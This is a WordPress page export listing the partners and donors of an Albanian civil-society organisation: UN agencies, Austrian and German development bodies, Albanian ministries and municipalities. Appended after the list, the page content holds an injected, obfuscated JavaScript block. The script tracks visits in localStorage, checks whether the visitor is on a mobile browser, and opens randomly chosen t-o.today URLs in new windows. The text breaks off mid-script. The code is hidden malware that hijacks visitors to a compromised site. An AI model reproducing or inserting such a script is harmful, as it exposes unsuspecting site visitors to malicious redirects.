{"id":270,"date":"2015-05-13T13:36:20","date_gmt":"2015-05-13T12:36:20","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=270"},"modified":"2018-12-12T11:53:26","modified_gmt":"2018-12-12T10:53:26","slug":"partneret","status":"publish","type":"page","link":"https:\/\/cdc-tff.org\/web\/?page_id=270","title":{"rendered":"Partneret"},"content":{"rendered":"<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1583\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/logo2.png\" alt=\"logo\" width=\"64\" height=\"14\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Volkshilfe Solidarit\u00e4t<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-full wp-image-3897\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/logo.jpg\" alt=\"logo\" width=\"64&quot;\" height=\"14\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Agjencia Austriake p\u00ebr Zhvillim<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1587\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/caritas.jpg\" alt=\"caritas\" width=\"64\" height=\"14\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Caritas St. P\u00f6lten<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"  wp-image-3559 alignnone\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c-300x156.jpg\" alt=\"kka_logo4c\" width=\"64\" height=\"33\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c-300x156.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c-1024x534.jpg 1024w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c-200x104.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c-860x449.jpg 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c-320x167.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c-1180x616.jpg 1180w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c-775x404.jpg 775w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/KKA_Logo4c.jpg 1894w\" sizes=\"(max-width: 64px) 100vw, 64px\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Kultur Kontakt AUSTRIA<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"  wp-image-1597 alignnone\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/worldvision.brandmaster.png\" alt=\"worldvision.brandmaster\" width=\"64\" height=\"24\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 World Vision<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1589\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/UNdp-300x179.jpg\" alt=\"UNdp\" width=\"64\" height=\"38\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/UNdp-300x179.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/UNdp-200x120.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/UNdp-320x191.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/UNdp.jpg 460w\" sizes=\"(max-width: 64px) 100vw, 64px\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 UNDP<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1593\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/unwomen-logo-blue-transparentbackground-en.png\" alt=\"unwomen-logo-blue-transparentbackground-en\" width=\"64\" height=\"17\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 UN Women<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1598\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Unicef_logo-2-300x85.jpg\" alt=\"Unicef_logo-2\" width=\"64\" height=\"20\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 UNICEF<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-3246\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/download-1.jpg\" alt=\"download (1)\" width=\"64\" height=\"43\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/download-1.jpg 275w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/download-1-200x133.jpg 200w\" sizes=\"(max-width: 64px) 100vw, 64px\" \/><\/p>\n<p style=\"padding-left: 120px;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Bashkimi Europian<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1605\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/aweden-300x132.png\" alt=\"aweden\" width=\"64\" height=\"34\" \/><\/p>\n<p style=\"padding-left: 120px;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Ambasada e Suedis\u00eb n\u00eb Tiran\u00eb<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1599\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Logo_OSFA-300x161-300x161.png\" alt=\"Logo_OSFA-300x161\" width=\"64\" height=\"36\" \/><\/p>\n<p style=\"padding-left: 120px;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 OSFA Fondacioni<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1600\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/mq1.jpg.png\" alt=\"mq1.jpg\" width=\"64\" height=\"23\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 REC\u00a0Shqip\u00ebri<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1592\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Cuty-of-viewa-logo-cdc-300x114.png\" alt=\"Cuty of viewa logo cdc\" width=\"64\" height=\"26\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 City of Vienna<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-4118\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/logo_koop-300x227.jpg\" alt=\"logo_koop\" width=\"64\" height=\"65\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/logo_koop-150x150.jpg 150w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/logo_koop-130x130.jpg 130w\" sizes=\"(max-width: 64px) 100vw, 64px\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Bashk\u00ebpunimi Gjerman<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-4119\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/gizlogo-unternehmen-de-rgb-72-300x125.jpg\" alt=\"gizlogo-unternehmen-de-rgb-72\" width=\"64\" height=\"40\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Bashk\u00ebpunimi Nd\u00ebrkomb\u00ebtar Gjerman<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-4192\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/SavetheChildren-300x300.jpg\" alt=\"SavetheChildren\" width=\"64\" height=\"73\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Save the Children Shqip\u00ebri<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-4266\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Leviz-Albania.jpg\" alt=\"Leviz Albania\" width=\"73\" height=\"49\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Leviz-Albania.jpg 273w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Leviz-Albania-200x135.jpg 200w\" sizes=\"(max-width: 73px) 100vw, 73px\" \/><\/p>\n<p style=\"text-align: left;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 L\u00ebviz Albania<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-3943\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/sK5keF3b_400x400-300x300.jpg\" alt=\"sK5keF3b_400x400\" width=\"64\" height=\"100\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Instituti p\u00ebr Demokraci dhe Nd\u00ebrmjet\u00ebsim<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-medium wp-image-4269\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/emblem-198x300.png\" alt=\"emblem\" width=\"54\" height=\"80 \" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/emblem-198x300.png 198w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/emblem-132x200.png 132w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/emblem.png 271w\" sizes=\"(max-width: 198px) 100vw, 198px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: left;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Drejtoria e Sh\u00ebndetit Publik Durr\u00ebs<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-medium wp-image-3946\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/rsz_weber_logo-1-250x300.png\" alt=\"rsz_weber_logo (1)\" width=\"64\" height=\"65\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rsz_weber_logo-1-150x150.png 150w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/rsz_weber_logo-1-130x130.png 130w\" sizes=\"(max-width: 64px) 100vw, 64px\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Projekti i Mund\u00ebsimit t\u00eb Shoq\u00ebris\u00eb Civile t\u00eb Ballkanit Per\u00ebndimor n\u00eb\u00a0Monitorimin e \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Reform\u00ebs s\u00eb Administrat\u00ebs Publike<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-medium wp-image-3888\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/download-1-300x152.png\" alt=\"download (1)\" width=\"64\" height=\"38\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Bread for the World<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-full wp-image-3889\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/eed.jpg\" alt=\"eed\" width=\"64\" height=\"38\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/eed.jpg 221w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/eed-200x121.jpg 200w\" sizes=\"(max-width: 64px) 100vw, 64px\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Evangelischer Entwicklungsdienst<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-full wp-image-3890\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/download-2.png\" alt=\"download (2)\" width=\"65\" height=\"37\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Ministria e Bujq\u00ebsis\u00eb dhe Zhvillimit Rural<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1638\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/13-10-24-05-30-27small_mmsr.jpg\" alt=\"\" width=\"65\" height=\"37\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Ministria e Sh\u00ebndet\u00ebsis\u00eb dhe Mbrojtjes Sociale<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-4196\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/small_logo_mk_bardh_e_zi_small.jpg\" alt=\"small_logo_mk_bardh_e_zi_small\" width=\"53\" height=\"41\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/small_logo_mk_bardh_e_zi_small.jpg 240w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/small_logo_mk_bardh_e_zi_small-200x153.jpg 200w\" sizes=\"(max-width: 53px) 100vw, 53px\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0\u00a0 \u00a0Ministria e\u00a0Kultur\u00ebs<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-3247\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/images.jpg\" alt=\"images\" width=\"70\" height=\"42\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/images.jpg 290w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/images-200x120.jpg 200w\" sizes=\"(max-width: 70px) 100vw, 70px\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Ministria e Arsimit, Sportit dhe Rinis\u00eb<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"  wp-image-3628 alignleft\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/sakt1.png\" alt=\"sakt\" width=\"40\" height=\"48\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Qendra Komb\u00ebtare Burimore e Trajnimit dhe Asistenc\u00ebs Teknike<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"  wp-image-3627 alignleft\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Logo31.png\" alt=\"Logo3\" width=\"40\" height=\"51\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Qendra t\u00eb Drejtat e Njeriut n\u00eb Demokraci<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1726\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/logo4.png\" alt=\"logo\" width=\"27\" height=\"39\" \/>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0Bashkia Tiran\u00eb<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1727\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/bashkia.png\" alt=\"bashkia\" width=\"28\" height=\"39\" \/>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Bashkia Durr\u00ebs<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1356\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/bashkia_puke_logo1.png\" alt=\"bashkia_puke_logo\" width=\"32\" height=\"44\" \/>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Bashkia Puk\u00eb<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-4274\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/download1.png\" alt=\"download\" width=\"40\" height=\"61\" \/><\/p>\n<p style=\"text-align: left;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Bashkia Shkod\u00ebr<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: left;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-4278\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb-174x300.png\" alt=\"Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb\" width=\"36\" height=\"62\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb-174x300.png 174w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb-595x1024.png 595w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb-116x200.png 116w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb-860x1480.png 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb-320x551.png 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb-1180x2031.png 1180w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb-775x1334.png 775w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Stema_e_Bashkis\u00eb_Kor\u00e7\u00eb.png 2000w\" sizes=\"(max-width: 36px) 100vw, 36px\" \/><\/p>\n<p style=\"text-align: left;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Bashkia Kor\u00e7\u00eb<\/p>\n<p>&nbsp;<\/p>\n<p>Bashkia Lezh\u00eb, Elbasan, Burrel, Sarand\u00eb<br \/>\nPrefekturat Tiran\u00eb, Durr\u00ebs, Lezh\u00eb, Shkod\u00ebr<br \/>\nDrejtoria Rajonale e Sh\u00ebrbimit Komb\u00ebtar t\u00eb Pun\u00ebsimit Shkod\u00ebr, Lezh\u00eb, Puk\u00eb, Kor\u00e7\u00eb<br \/>\nDrejtoria Rajonale e Formimit Profesional Publik Shkod\u00ebr, Kor\u00e7\u00eb<br \/>\nRrjeti i Mekanizmit kund\u00ebr Dhun\u00ebs n\u00eb Familje<br \/>\nRrjeti i Sh\u00ebrbimeve Mjedisore \u2013 SENIOR-A<br \/>\nKoalicioni p\u00ebr Zgjedhje t\u00eb Lira e t\u00eb Ndershme dhe p\u00ebr Demokraci t\u00eb Qendrueshme<br \/>\nKoalicioni p\u00ebr Nxitjen e Pjesmarrjes s\u00eb Grave dhe t\u00eb Rinjve n\u00eb Politik\u00eb<br \/>\nRrjeti i Axhend\u00ebs Gjinore p\u00ebr Zhvillimin Rural n\u00eb Ballkan<br \/>\nRrjeti Global i Fushatave Inovative kund\u00ebr Dhun\u00ebs me Baz\u00eb Gjinore<br \/>\nTask Force p\u00ebr Platform\u00ebn Gjinore<br \/>\nRrjeti Evropian kund\u00ebr Racizmit dhe Diskriminimit<br \/>\nRrjeti Global i t\u00eb Rinjve n\u00eb Sh\u00ebrbim t\u00eb Komunitetit<br \/>\nUniversitetet Shtet\u00ebrore t\u00eb Shkencave Sociale Tiran\u00eb dhe Durr\u00ebs, Universiteti Polis<br \/>\nAkademik\u00eb t\u00eb fush\u00ebs sociale dhe t\u00eb s\u00eb drejt\u00ebs[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 